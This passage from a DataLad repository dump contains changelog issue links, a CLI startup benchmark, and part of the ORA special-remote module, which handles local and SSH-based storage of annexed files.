https://github.com/datalad/datalad/issues/4471\n[#4477]: https://github.com/datalad/datalad/issues/4477\n[#4480]: https://github.com/datalad/datalad/issues/4480\n[#4481]: https://github.com/datalad/datalad/issues/4481\n[#4504]: https://github.com/datalad/datalad/issues/4504\n[#4526]: https://github.com/datalad/datalad/issues/4526\n[#4529]: https://github.com/datalad/datalad/issues/4529\n[#4543]: https://github.com/datalad/datalad/issues/4543\n[#4544]: https://github.com/datalad/datalad/issues/4544\n[#4549]: https://github.com/datalad/datalad/issues/4549\n[#4552]: https://github.com/datalad/datalad/issues/4552\n[#4553]: https://github.com/datalad/datalad/issues/4553\n[#4560]: https://github.com/datalad/datalad/issues/4560\n[#4568]: https://github.com/datalad/datalad/issues/4568\n[#4581]: https://github.com/datalad/datalad/issues/4581\n[#4583]: https://github.com/datalad/datalad/issues/4583\n[#4597]: https://github.com/datalad/datalad/issues/4597\n[#4617]: https://github.com/datalad/datalad/issues/4617\n[#4619]: https://github.com/datalad/datalad/issues/4619\n[#4620]: 
https://github.com/datalad/datalad/issues/4620\n[#4650]: https://github.com/datalad/datalad/issues/4650\n[#4657]: https://github.com/datalad/datalad/issues/4657\n[#4666]: https://github.com/datalad/datalad/issues/4666\n[#4669]: https://github.com/datalad/datalad/issues/4669\n[#4673]: https://github.com/datalad/datalad/issues/4673\n[#4674]: https://github.com/datalad/datalad/issues/4674\n[#4675]: https://github.com/datalad/datalad/issues/4675\n[#4682]: https://github.com/datalad/datalad/issues/4682\n[#4683]: https://github.com/datalad/datalad/issues/4683\n[#4684]: https://github.com/datalad/datalad/issues/4684\n[#4687]: https://github.com/datalad/datalad/issues/4687\n[#4692]: https://github.com/datalad/datalad/issues/4692\n[#4695]: https://github.com/datalad/datalad/issues/4695\n[#4696]: https://github.com/datalad/datalad/issues/4696\n[#4699]: https://github.com/datalad/datalad/issues/4699\n[#4703]: https://github.com/datalad/datalad/issues/4703\n[#4729]: https://github.com/datalad/datalad/issues/4729\n[#4736]: https://github.com/datalad/datalad/issues/4736\n[#4745]: https://github.com/datalad/datalad/issues/4745\n[#4746]: https://github.com/datalad/datalad/issues/4746\n[#4749]: https://github.com/datalad/datalad/issues/4749\n[#4757]: https://github.com/datalad/datalad/issues/4757\n[#4759]: https://github.com/datalad/datalad/issues/4759\n[#4760]: https://github.com/datalad/datalad/issues/4760\n[#4763]: https://github.com/datalad/datalad/issues/4763\n[#4764]: https://github.com/datalad/datalad/issues/4764\n[#4769]: https://github.com/datalad/datalad/issues/4769\n[#4775]: https://github.com/datalad/datalad/issues/4775\n[#4786]: https://github.com/datalad/datalad/issues/4786\n[#4788]: https://github.com/datalad/datalad/issues/4788\n[#4790]: https://github.com/datalad/datalad/issues/4790\n[#4792]: https://github.com/datalad/datalad/issues/4792\n[#4793]: https://github.com/datalad/datalad/issues/4793\n[#4806]: https://github.com/datalad/datalad/issues/4806\n[#4807]: https://github.com/datalad/datalad/issues/4807\n[#4816]: https://github.com/datalad/datalad/issues/4816\n[#4817]: https://github.com/datalad/datalad/issues/4817\n[#4821]: https://github.com/datalad/datalad/issues/4821\n[#4824]: https://github.com/datalad/datalad/issues/4824\n[#4828]: https://github.com/datalad/datalad/issues/4828\n[#4829]: https://github.com/datalad/datalad/issues/4829\n[#4834]: https://github.com/datalad/datalad/issues/4834\n[#4835]: https://github.com/datalad/datalad/issues/4835\n[#4845]: https://github.com/datalad/datalad/issues/4845\n[#4853]: https://github.com/datalad/datalad/issues/4853\n[#4855]: https://github.com/datalad/datalad/issues/4855\n[#4866]: https://github.com/datalad/datalad/issues/4866\n[#4867]: https://github.com/datalad/datalad/issues/4867\n[#4868]: https://github.com/datalad/datalad/issues/4868\n[#4877]: https://github.com/datalad/datalad/issues/4877\n[#4879]: https://github.com/datalad/datalad/issues/4879\n[#4896]: https://github.com/datalad/datalad/issues/4896\n[#4899]: https://github.com/datalad/datalad/issues/4899\n[#4900]: https://github.com/datalad/datalad/issues/4900\n[#4904]: https://github.com/datalad/datalad/issues/4904\n[#4908]: https://github.com/datalad/datalad/issues/4908\n[#4911]: https://github.com/datalad/datalad/issues/4911\n[#4924]: https://github.com/datalad/datalad/issues/4924\n[#4926]: https://github.com/datalad/datalad/issues/4926\n[#4927]: https://github.com/datalad/datalad/issues/4927\n[#4931]: https://github.com/datalad/datalad/issues/4931\n[#4952]: 
https://github.com/datalad/datalad/issues/4952\n[#4953]: https://github.com/datalad/datalad/issues/4953\n[#4955]: https://github.com/datalad/datalad/issues/4955\n[#4957]: https://github.com/datalad/datalad/issues/4957\n[#4963]: https://github.com/datalad/datalad/issues/4963\n[#4966]: https://github.com/datalad/datalad/issues/4966\n[#4977]: https://github.com/datalad/datalad/issues/4977\n[#4982]: https://github.com/datalad/datalad/issues/4982\n[#4985]: https://github.com/datalad/datalad/issues/4985\n[#4991]: https://github.com/datalad/datalad/issues/4991\n[#4996]: https://github.com/datalad/datalad/issues/4996\n[#5001]: https://github.com/datalad/datalad/issues/5001\n[#5002]: https://github.com/datalad/datalad/issues/5002\n[#5008]: https://github.com/datalad/datalad/issues/5008\n[#5010]: https://github.com/datalad/datalad/issues/5010\n[#5017]: https://github.com/datalad/datalad/issues/5017\n[#5022]: https://github.com/datalad/datalad/issues/5022\n[#5025]: https://github.com/datalad/datalad/issues/5025\n[#5026]: https://github.com/datalad/datalad/issues/5026\n[#5035]: https://github.com/datalad/datalad/issues/5035\n[#5042]: https://github.com/datalad/datalad/issues/5042\n[#5045]: https://github.com/datalad/datalad/issues/5045\n[#5049]: https://github.com/datalad/datalad/issues/5049\n[#5051]: https://github.com/datalad/datalad/issues/5051\n[#5057]: https://github.com/datalad/datalad/issues/5057\n[#5060]: https://github.com/datalad/datalad/issues/5060\n[#5067]: https://github.com/datalad/datalad/issues/5067\n[#5070]: https://github.com/datalad/datalad/issues/5070\n[#5076]: https://github.com/datalad/datalad/issues/5076\n[#5081]: https://github.com/datalad/datalad/issues/5081\n[#5090]: https://github.com/datalad/datalad/issues/5090\n[#5091]: https://github.com/datalad/datalad/issues/5091\n[#5106]: https://github.com/datalad/datalad/issues/5106\n[#5108]: https://github.com/datalad/datalad/issues/5108\n[#5113]: https://github.com/datalad/datalad/issues/5113\n[#5119]: https://github.com/datalad/datalad/issues/5119\n[#5121]: https://github.com/datalad/datalad/issues/5121\n[#5125]: https://github.com/datalad/datalad/issues/5125\n[#5127]: https://github.com/datalad/datalad/issues/5127\n[#5128]: https://github.com/datalad/datalad/issues/5128\n[#5129]: https://github.com/datalad/datalad/issues/5129\n[#5136]: https://github.com/datalad/datalad/issues/5136\n[#5141]: https://github.com/datalad/datalad/issues/5141\n[#5142]: https://github.com/datalad/datalad/issues/5142\n[#5146]: https://github.com/datalad/datalad/issues/5146\n[#5148]: https://github.com/datalad/datalad/issues/5148\n[#5151]: https://github.com/datalad/datalad/issues/5151\n[#5156]: https://github.com/datalad/datalad/issues/5156\n[#5163]: https://github.com/datalad/datalad/issues/5163\n[#5184]: https://github.com/datalad/datalad/issues/5184\n[#5194]: https://github.com/datalad/datalad/issues/5194\n[#5200]: https://github.com/datalad/datalad/issues/5200\n[#5201]: https://github.com/datalad/datalad/issues/5201\n[#5214]: https://github.com/datalad/datalad/issues/5214\n[#5218]: https://github.com/datalad/datalad/issues/5218\n[#5219]: https://github.com/datalad/datalad/issues/5219\n[#5229]: https://github.com/datalad/datalad/issues/5229\n[#5238]: https://github.com/datalad/datalad/issues/5238\n[#5241]: https://github.com/datalad/datalad/issues/5241\n[#5254]: https://github.com/datalad/datalad/issues/5254\n[#5255]: https://github.com/datalad/datalad/issues/5255\n[#5258]: https://github.com/datalad/datalad/issues/5258\n[#5259]: 
https://github.com/datalad/datalad/issues/5259\n[#5269]: https://github.com/datalad/datalad/issues/5269\n[#5276]: https://github.com/datalad/datalad/issues/5276\n[#5278]: https://github.com/datalad/datalad/issues/5278\n[#5285]: https://github.com/datalad/datalad/issues/5285\n[#5290]: https://github.com/datalad/datalad/issues/5290\n[#5328]: https://github.com/datalad/datalad/issues/5328\n[#5332]: https://github.com/datalad/datalad/issues/5332\n[#5342]: https://github.com/datalad/datalad/issues/5342\n[#5344]: https://github.com/datalad/datalad/issues/5344\n[#5346]: https://github.com/datalad/datalad/issues/5346\n[#5350]: https://github.com/datalad/datalad/issues/5350\n[#5367]: https://github.com/datalad/datalad/issues/5367\n[#5389]: https://github.com/datalad/datalad/issues/5389\n[#5391]: https://github.com/datalad/datalad/issues/5391\n[#5415]: https://github.com/datalad/datalad/issues/5415\n[#5416]: https://github.com/datalad/datalad/issues/5416\n[#5421]: https://github.com/datalad/datalad/issues/5421\n[#5425]: https://github.com/datalad/datalad/issues/5425\n[#5430]: https://github.com/datalad/datalad/issues/5430\n[#5431]: https://github.com/datalad/datalad/issues/5431\n[#5436]: https://github.com/datalad/datalad/issues/5436\n[#5438]: https://github.com/datalad/datalad/issues/5438\n[#5441]: https://github.com/datalad/datalad/issues/5441\n[#5453]: https://github.com/datalad/datalad/issues/5453\n[#5458]: https://github.com/datalad/datalad/issues/5458\n[#5461]: https://github.com/datalad/datalad/issues/5461\n[#5466]: https://github.com/datalad/datalad/issues/5466\n[#5474]: https://github.com/datalad/datalad/issues/5474\n[#5476]: https://github.com/datalad/datalad/issues/5476\n[#5480]: https://github.com/datalad/datalad/issues/5480\n[#5488]: https://github.com/datalad/datalad/issues/5488\n[#5492]: https://github.com/datalad/datalad/issues/5492\n[#5505]: https://github.com/datalad/datalad/issues/5505\n[#5509]: https://github.com/datalad/datalad/issues/5509\n[#5512]: https://github.com/datalad/datalad/issues/5512\n[#5525]: https://github.com/datalad/datalad/issues/5525\n[#5531]: https://github.com/datalad/datalad/issues/5531\n[#5533]: https://github.com/datalad/datalad/issues/5533\n[#5534]: https://github.com/datalad/datalad/issues/5534\n[#5536]: https://github.com/datalad/datalad/issues/5536\n[#5539]: https://github.com/datalad/datalad/issues/5539\n[#5543]: https://github.com/datalad/datalad/issues/5543\n[#5544]: https://github.com/datalad/datalad/issues/5544\n[#5550]: https://github.com/datalad/datalad/issues/5550\n[#5551]: https://github.com/datalad/datalad/issues/5551\n[#5552]: https://github.com/datalad/datalad/issues/5552\n[#5555]: https://github.com/datalad/datalad/issues/5555\n[#5558]: https://github.com/datalad/datalad/issues/5558\n[#5559]: https://github.com/datalad/datalad/issues/5559\n[#5560]: https://github.com/datalad/datalad/issues/5560\n[#5569]: https://github.com/datalad/datalad/issues/5569\n[#5572]: https://github.com/datalad/datalad/issues/5572\n[#5577]: https://github.com/datalad/datalad/issues/5577\n[#5580]: https://github.com/datalad/datalad/issues/5580\n[#5592]: https://github.com/datalad/datalad/issues/5592\n[#5594]: https://github.com/datalad/datalad/issues/5594\n[#5603]: https://github.com/datalad/datalad/issues/5603\n[#5607]: https://github.com/datalad/datalad/issues/5607\n[#5609]: https://github.com/datalad/datalad/issues/5609\n[#5612]: https://github.com/datalad/datalad/issues/5612\n[#5630]: https://github.com/datalad/datalad/issues/5630\n[#5632]: 
https://github.com/datalad/datalad/issues/5632\n[#5639]: https://github.com/datalad/datalad/issues/5639\n[#5655]: https://github.com/datalad/datalad/issues/5655\n[#5667]: https://github.com/datalad/datalad/issues/5667\n[#5675]: https://github.com/datalad/datalad/issues/5675\n[#5680]: https://github.com/datalad/datalad/issues/5680\n[#5681]: https://github.com/datalad/datalad/issues/5681\n[#5682]: https://github.com/datalad/datalad/issues/5682\n[#5683]: https://github.com/datalad/datalad/issues/5683\n[#5689]: https://github.com/datalad/datalad/issues/5689\n[#5692]: https://github.com/datalad/datalad/issues/5692\n[#5693]: https://github.com/datalad/datalad/issues/5693\n[#5696]: https://github.com/datalad/datalad/issues/5696\n[#5698]: https://github.com/datalad/datalad/issues/5698\n[#5708]: https://github.com/datalad/datalad/issues/5708\n[#5726]: https://github.com/datalad/datalad/issues/5726\n[#5738]: https://github.com/datalad/datalad/issues/5738\n[#5740]: https://github.com/datalad/datalad/issues/5740\n[#5749]: https://github.com/datalad/datalad/issues/5749\n[#5760]: https://github.com/datalad/datalad/issues/5760\n[#5777]: https://github.com/datalad/datalad/issues/5777\n[#5789]: https://github.com/datalad/datalad/issues/5789\n[#5792]: https://github.com/datalad/datalad/issues/5792\n[#5803]: https://github.com/datalad/datalad/issues/5803\n[#5804]: https://github.com/datalad/datalad/issues/5804\n[#5805]: https://github.com/datalad/datalad/issues/5805\n[#5823]: https://github.com/datalad/datalad/issues/5823\n[#5837]: https://github.com/datalad/datalad/issues/5837\n[#5847]: https://github.com/datalad/datalad/issues/5847\n[#5884]: https://github.com/datalad/datalad/issues/5884\n[#5892]: https://github.com/datalad/datalad/issues/5892\n[#5902]: https://github.com/datalad/datalad/issues/5902\n[#5904]: https://github.com/datalad/datalad/issues/5904\n[#5907]: https://github.com/datalad/datalad/issues/5907\n[#5913]: https://github.com/datalad/datalad/issues/5913\n[#5915]: https://github.com/datalad/datalad/issues/5915\n[#5956]: https://github.com/datalad/datalad/issues/5956\n" }, { "alpha_fraction": 0.5520548224449158, "alphanum_fraction": 0.5541095733642578, "avg_line_length": 29.41666603088379, "blob_id": "8aeb405de4f16f3abe66681ba4d67460eba1e90a", "content_id": "d06833c8075c4372e1e98ee794d2c5b998c6186d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1460, "license_type": "permissive", "max_line_length": 79, "num_lines": 48, "path": "/benchmarks/cli.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Benchmarks for DataLad CLI\"\"\"\n\nimport os\nimport sys\nimport os.path as osp\n\nfrom subprocess import call\nfrom .common import SuprocBenchmarks\n\n\nclass startup(SuprocBenchmarks):\n \"\"\"\n Benchmarks for datalad command startup\n \"\"\"\n\n def setup(self):\n # we need to prepare/adjust PATH to point to installed datalad\n # We will base it on taking sys.executable\n python_path = osp.dirname(sys.executable)\n self.env = os.environ.copy()\n self.env['PATH'] = '%s:%s' % (python_path, self.env.get('PATH', ''))\n\n def time_usage_advice(self):\n call([\"datalad\"], env=self.env)\n\n def 
time_short_help(self):\n call([\"datalad\", \"-h\"], env=self.env)\n\n def time_help_np(self):\n call([\"datalad\", \"--help-np\"], env=self.env)\n\n def time_command_short_help(self):\n call([\"datalad\", \"wtf\", \"-h\"], env=self.env)\n\n def time_command_help_np(self):\n call([\"datalad\", \"wtf\", \"--help-np\"], env=self.env)\n\n def time_command_execution(self):\n # pick a command that should be minimally impacted by\n # non-CLI factors\n call([\"datalad\", \"wtf\", \"-S\", \"python\"], env=self.env)\n" }, { "alpha_fraction": 0.5538864731788635, "alphanum_fraction": 0.5561690330505371, "avg_line_length": 38.08378601074219, "blob_id": "483d3e3d3024ec636662a501b7f72ce2a81b3f91", "content_id": "682580ab3bc165b6e97f3ace913c39be736c79ab", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 64840, "license_type": "permissive", "max_line_length": 93, "num_lines": 1659, "path": "/datalad/distributed/ora_remote.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import functools\nimport os\nimport stat\nimport sys\nfrom pathlib import (\n Path,\n PurePosixPath\n)\nfrom contextlib import contextmanager\nimport requests\nimport shutil\nfrom shlex import quote as sh_quote\nimport subprocess\nimport logging\nfrom functools import wraps\n\nfrom datalad import ssh_manager\nfrom datalad.config import anything2bool\nfrom datalad.customremotes import (\n ProtocolError,\n RemoteError,\n SpecialRemote,\n)\nfrom datalad.customremotes.main import main as super_main\nfrom datalad.support.annex_utils import _sanitize_key\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n AccessDeniedError,\n AccessFailedError,\n CapturedException,\n DownloadError\n)\nfrom datalad.support.network import url_path2local_path\nfrom datalad.customremotes.ria_utils import (\n get_layout_locations,\n UnknownLayoutVersion,\n verify_ria_url,\n)\nfrom datalad.utils import (\n ensure_write_permission,\n on_osx\n)\n\n\nlgr = logging.getLogger('datalad.customremotes.ria_remote')\n\nDEFAULT_BUFFER_SIZE = 65536\n\n# TODO\n# - make archive check optional\n\n\n# only use by _get_datalad_id\ndef _get_gitcfg(gitdir, key, cfgargs=None, regex=False):\n cmd = [\n 'git',\n '--git-dir', gitdir,\n 'config',\n ]\n if cfgargs:\n cmd += cfgargs\n\n cmd += ['--get-regexp'] if regex else ['--get']\n cmd += [key]\n try:\n return subprocess.check_output(\n cmd,\n # yield text\n universal_newlines=True).strip()\n except Exception:\n lgr.debug(\n \"Failed to obtain config '%s' at %s\",\n key, gitdir,\n )\n return None\n\n\n# cannot be replaced until https://github.com/datalad/datalad/issues/6264\n# is fixed\ndef _get_datalad_id(gitdir):\n \"\"\"Attempt to determine a DataLad dataset ID for a given repo\n\n Returns\n -------\n str or None\n None in case no ID was found\n \"\"\"\n dsid = _get_gitcfg(\n gitdir, 'datalad.dataset.id', ['--blob', ':.datalad/config']\n )\n if dsid is None:\n lgr.debug(\n \"Cannot determine a DataLad ID for repository: %s\",\n gitdir,\n )\n else:\n dsid = dsid.strip()\n return dsid\n\n\nclass RemoteCommandFailedError(Exception):\n pass\n\n\nclass RIARemoteError(RemoteError):\n pass\n\n\nclass IOBase(object):\n \"\"\"Abstract class with the desired API for local/remote operations\"\"\"\n\n def get_7z(self):\n raise NotImplementedError\n\n def mkdir(self, path):\n raise NotImplementedError\n\n def symlink(self, target, link_name):\n raise NotImplementedError\n\n def put(self, src, dst, 
progress_cb):\n raise NotImplementedError\n\n def get(self, src, dst, progress_cb):\n raise NotImplementedError\n\n def rename(self, src, dst):\n raise NotImplementedError\n\n def remove(self, path):\n raise NotImplementedError\n\n def exists(self, path):\n raise NotImplementedError\n\n def get_from_archive(self, archive, src, dst, progress_cb):\n \"\"\"Get a file from an archive\n\n Parameters\n ----------\n archive_path : Path or str\n Must be an absolute path and point to an existing supported archive\n file_path : Path or str\n Must be a relative Path (relative to the root\n of the archive)\n \"\"\"\n raise NotImplementedError\n\n def in_archive(self, archive_path, file_path):\n \"\"\"Test whether a file is in an archive\n\n Parameters\n ----------\n archive_path : Path or str\n Must be an absolute path and point to an existing supported archive\n file_path : Path or str\n Must be a relative Path (relative to the root\n of the archive)\n \"\"\"\n raise NotImplementedError\n\n def read_file(self, file_path):\n \"\"\"Read a remote file's content\n\n Parameters\n ----------\n file_path : Path or str\n Must be an absolute path\n\n Returns\n -------\n string\n \"\"\"\n\n raise NotImplementedError\n\n def write_file(self, file_path, content, mode='w'):\n \"\"\"Write a remote file\n\n Parameters\n ----------\n file_path : Path or str\n Must be an absolute path\n content : str\n \"\"\"\n\n raise NotImplementedError\n\n\nclass LocalIO(IOBase):\n \"\"\"IO operation if the object tree is local (e.g. NFS-mounted)\"\"\"\n\n ensure_writeable = staticmethod(ensure_write_permission)\n\n def mkdir(self, path):\n path.mkdir(\n parents=True,\n exist_ok=True,\n )\n\n def symlink(self, target, link_name):\n os.symlink(target, link_name)\n\n def put(self, src, dst, progress_cb):\n shutil.copy(\n str(src),\n str(dst),\n )\n\n def get(self, src, dst, progress_cb):\n shutil.copy(\n str(src),\n str(dst),\n )\n\n def get_from_archive(self, archive, src, dst, progress_cb):\n # Upfront check to avoid cryptic error output\n # https://github.com/datalad/datalad/issues/4336\n if not self.exists(archive):\n raise RIARemoteError(\"archive {arc} does not exist.\"\n \"\".format(arc=archive))\n\n # this requires python 3.5\n with open(dst, 'wb') as target_file:\n subprocess.run([\n '7z', 'x', '-so',\n str(archive), str(src)],\n stdout=target_file,\n )\n # Note for progress reporting:\n # man 7z:\n #\n # -bs{o|e|p}{0|1|2}\n # Set output stream for output/error/progress line\n\n def rename(self, src, dst):\n with self.ensure_writeable(dst.parent):\n src.rename(dst)\n\n def remove(self, path):\n try:\n with self.ensure_writeable(path.parent):\n path.unlink()\n except PermissionError as e:\n raise RIARemoteError(f\"Unable to remove {path}. 
Could not \"\n \"obtain write permission for containing\"\n \"directory.\") from e\n\n def remove_dir(self, path):\n with self.ensure_writeable(path.parent):\n path.rmdir()\n\n def exists(self, path):\n return path.exists()\n\n def in_archive(self, archive_path, file_path):\n if not archive_path.exists():\n # no archive, not file\n return False\n loc = str(file_path)\n from datalad.cmd import (\n StdOutErrCapture,\n WitlessRunner,\n )\n runner = WitlessRunner()\n # query 7z for the specific object location, keeps the output\n # lean, even for big archives\n out = runner.run(\n ['7z', 'l', str(archive_path),\n loc],\n protocol=StdOutErrCapture,\n )\n return loc in out['stdout']\n\n def read_file(self, file_path):\n\n with open(str(file_path), 'r') as f:\n content = f.read()\n return content\n\n def write_file(self, file_path, content, mode='w'):\n if not content.endswith('\\n'):\n content += '\\n'\n with open(str(file_path), mode) as f:\n f.write(content)\n\n def get_7z(self):\n from datalad.cmd import CommandError, StdOutErrCapture, WitlessRunner\n # from datalad.utils import on_windows\n\n runner = WitlessRunner()\n # TODO: To not rely on availability in PATH we might want to use `which`\n # (`where` on windows) and get the actual path to 7z to re-use in\n # in_archive() and get().\n # Note: `command -v XXX` or `type` might be cross-platform\n # solution!\n # However, for availability probing only, it would be sufficient\n # to just call 7z and see whether it returns zero.\n\n # cmd = 'where' if on_windows else 'which'\n # try:\n # out = runner.run([cmd, '7z'], protocol=StdOutErrCapture)\n # return out['stdout']\n # except CommandError:\n # return None\n\n try:\n runner.run('7z', protocol=StdOutErrCapture)\n return True\n except (FileNotFoundError, CommandError):\n return False\n\n\nclass SSHRemoteIO(IOBase):\n \"\"\"IO operation if the object tree is SSH-accessible\n\n It doesn't even think about a windows server.\n \"\"\"\n\n # output markers to detect possible command failure as well as end of output\n # from a particular command:\n REMOTE_CMD_FAIL = \"ora-remote: end - fail\"\n REMOTE_CMD_OK = \"ora-remote: end - ok\"\n\n def __init__(self, host, buffer_size=DEFAULT_BUFFER_SIZE):\n \"\"\"\n Parameters\n ----------\n host : str\n SSH-accessible host(name) to perform remote IO operations\n on.\n \"\"\"\n\n # the connection to the remote\n # we don't open it yet, not yet clear if needed\n self.ssh = ssh_manager.get_connection(\n host,\n use_remote_annex_bundle=False,\n )\n self.ssh.open()\n # open a remote shell\n cmd = ['ssh'] + self.ssh._ssh_args + [self.ssh.sshri.as_str()]\n self.shell = subprocess.Popen(cmd,\n stderr=subprocess.DEVNULL,\n stdout=subprocess.PIPE,\n stdin=subprocess.PIPE)\n # swallow login message(s):\n self.shell.stdin.write(b\"echo RIA-REMOTE-LOGIN-END\\n\")\n self.shell.stdin.flush()\n while True:\n line = self.shell.stdout.readline()\n if line == b\"RIA-REMOTE-LOGIN-END\\n\":\n break\n # TODO: Same for stderr?\n\n # make sure default is used when None was passed, too.\n self.buffer_size = buffer_size if buffer_size else DEFAULT_BUFFER_SIZE\n\n def close(self):\n # try exiting shell clean first\n self.shell.stdin.write(b\"exit\\n\")\n self.shell.stdin.flush()\n exitcode = self.shell.wait(timeout=0.5)\n # be more brutal if it doesn't work\n if exitcode is None: # timed out\n # TODO: Theoretically terminate() can raise if not successful.\n # How to deal with that?\n self.shell.terminate()\n\n def _append_end_markers(self, cmd):\n \"\"\"Append end markers to remote 
command\"\"\"\n\n return cmd + \" && printf '%s\\\\n' {} || printf '%s\\\\n' {}\\n\".format(\n sh_quote(self.REMOTE_CMD_OK),\n sh_quote(self.REMOTE_CMD_FAIL))\n\n def _get_download_size_from_key(self, key):\n \"\"\"Get the size of an annex object file from it's key\n\n Note, that this is not necessarily the size of the annexed file, but\n possibly only a chunk of it.\n\n Parameter\n ---------\n key: str\n annex key of the file\n\n Returns\n -------\n int\n size in bytes\n \"\"\"\n # TODO: datalad's AnnexRepo.get_size_from_key() is not correct/not\n # fitting. Incorporate the wisdom there, too.\n # We prob. don't want to actually move this method there, since\n # AnnexRepo would be quite an expensive import. Startup time for\n # special remote matters.\n # TODO: this method can be more compact. we don't need particularly\n # elaborated error distinction\n\n # see: https://git-annex.branchable.com/internals/key_format/\n key_parts = key.split('--')\n key_fields = key_parts[0].split('-')\n\n s = S = C = None\n\n for field in key_fields[1:]: # note: first has to be backend -> ignore\n if field.startswith('s'):\n # size of the annexed file content:\n s = int(field[1:]) if field[1:].isdigit() else None\n elif field.startswith('S'):\n # we have a chunk and that's the chunksize:\n S = int(field[1:]) if field[1:].isdigit() else None\n elif field.startswith('C'):\n # we have a chunk, this is it's number:\n C = int(field[1:]) if field[1:].isdigit() else None\n\n if s is None:\n return None\n elif S is None and C is None:\n return s\n elif S and C:\n if C <= int(s / S):\n return S\n else:\n return s % S\n else:\n raise RIARemoteError(\"invalid key: {}\".format(key))\n\n def _run(self, cmd, no_output=True, check=False):\n\n # TODO: we might want to redirect stderr to stdout here (or have\n # additional end marker in stderr) otherwise we can't empty stderr\n # to be ready for next command. 
We also can't read stderr for\n # better error messages (RemoteError) without making sure there's\n # something to read in any case (it's blocking!).\n # However, if we are sure stderr can only ever happen if we would\n # raise RemoteError anyway, it might be okay.\n call = self._append_end_markers(cmd)\n self.shell.stdin.write(call.encode())\n self.shell.stdin.flush()\n\n lines = []\n while True:\n line = self.shell.stdout.readline().decode()\n lines.append(line)\n if line == self.REMOTE_CMD_OK + '\\n':\n # end reading\n break\n elif line == self.REMOTE_CMD_FAIL + '\\n':\n if check:\n raise RemoteCommandFailedError(\n \"{cmd} failed: {msg}\".format(cmd=cmd,\n msg=\"\".join(lines[:-1]))\n )\n else:\n break\n if no_output and len(lines) > 1:\n raise RIARemoteError(\"{}: {}\".format(call, \"\".join(lines)))\n return \"\".join(lines[:-1])\n\n @contextmanager\n def ensure_writeable(self, path):\n \"\"\"Context manager to get write permission on `path` and restore\n original mode afterwards.\n\n If git-annex ever touched the key store, the keys will be in mode 444\n directories, and we need to obtain permission first.\n\n Parameters\n ----------\n path: Path\n path to the target file\n \"\"\"\n\n path = sh_quote(str(path))\n # remember original mode -- better than to prescribe a fixed mode\n\n if on_osx:\n format_option = \"-f%Dp\"\n # on macOS this would return decimal representation of mode (same\n # as python's stat().st_mode\n conversion = int\n else: # win is currently ignored anyway\n format_option = \"--format=\\\"%f\\\"\"\n # in opposition to the above form for macOS, on debian this would\n # yield the hexadecimal representation of the mode; hence conversion\n # needed.\n conversion = functools.partial(int, base=16)\n\n output = self._run(f\"stat {format_option} {path}\",\n no_output=False, check=True)\n mode = conversion(output)\n if not mode & stat.S_IWRITE:\n new_mode = oct(mode | stat.S_IWRITE)[-3:]\n self._run(f\"chmod {new_mode} {path}\")\n changed = True\n else:\n changed = False\n try:\n yield\n finally:\n if changed:\n # restore original mode\n self._run(\"chmod {mode} {file}\".format(mode=oct(mode)[-3:],\n file=path),\n check=False) # don't fail if path doesn't exist\n # anymore\n\n def mkdir(self, path):\n self._run('mkdir -p {}'.format(sh_quote(str(path))))\n\n def symlink(self, target, link_name):\n self._run('ln -s {} {}'.format(sh_quote(str(target)), sh_quote(str(link_name))))\n\n def put(self, src, dst, progress_cb):\n self.ssh.put(str(src), str(dst))\n\n def get(self, src, dst, progress_cb):\n\n # Note, that as we are in blocking mode, we can't easily fail on the\n # actual get (that is 'cat').\n # Therefore check beforehand.\n if not self.exists(src):\n raise RIARemoteError(\"annex object {src} does not exist.\"\n \"\".format(src=src))\n\n from os.path import basename\n key = basename(str(src))\n try:\n size = self._get_download_size_from_key(key)\n except RemoteError as e:\n raise RemoteError(f\"src: {src}\") from e\n\n if size is None:\n # rely on SCP for now\n self.ssh.get(str(src), str(dst))\n return\n\n # TODO: see get_from_archive()\n\n # TODO: Currently we will hang forever if the file isn't readable and\n # it's supposed size is bigger than whatever cat spits out on\n # stdout. This is because we don't notice that cat has exited\n # non-zero. We could have end marker on stderr instead, but then\n # we need to empty stderr beforehand to not act upon output from\n # earlier calls. 
This is a problem with blocking reading, since we\n # need to make sure there's actually something to read in any\n # case.\n cmd = 'cat {}'.format(sh_quote(str(src)))\n self.shell.stdin.write(cmd.encode())\n self.shell.stdin.write(b\"\\n\")\n self.shell.stdin.flush()\n\n with open(dst, 'wb') as target_file:\n bytes_received = 0\n while bytes_received < size:\n # TODO: some additional abortion criteria? check stderr in\n # addition?\n c = self.shell.stdout.read1(self.buffer_size)\n # no idea yet, whether or not there's sth to gain by a\n # sophisticated determination of how many bytes to read at once\n # (like size - bytes_received)\n if c:\n bytes_received += len(c)\n target_file.write(c)\n progress_cb(bytes_received)\n\n def rename(self, src, dst):\n with self.ensure_writeable(dst.parent):\n self._run('mv {} {}'.format(sh_quote(str(src)), sh_quote(str(dst))))\n\n def remove(self, path):\n try:\n with self.ensure_writeable(path.parent):\n self._run('rm {}'.format(sh_quote(str(path))), check=True)\n except RemoteCommandFailedError as e:\n raise RIARemoteError(f\"Unable to remove {path} \"\n \"or to obtain write permission in parent directory.\") from e\n\n def remove_dir(self, path):\n with self.ensure_writeable(path.parent):\n self._run('rmdir {}'.format(sh_quote(str(path))))\n\n def exists(self, path):\n try:\n self._run('test -e {}'.format(sh_quote(str(path))), check=True)\n return True\n except RemoteCommandFailedError:\n return False\n\n def in_archive(self, archive_path, file_path):\n\n if not self.exists(archive_path):\n return False\n\n loc = str(file_path)\n # query 7z for the specific object location, keeps the output\n # lean, even for big archives\n cmd = '7z l {} {}'.format(\n sh_quote(str(archive_path)),\n sh_quote(loc))\n\n # Note: Currently relies on file_path not showing up in case of failure\n # including non-existent archive. If need be could be more sophisticated\n # and called with check=True + catch RemoteCommandFailedError\n out = self._run(cmd, no_output=False, check=False)\n\n return loc in out\n\n def get_from_archive(self, archive, src, dst, progress_cb):\n\n # Note, that as we are 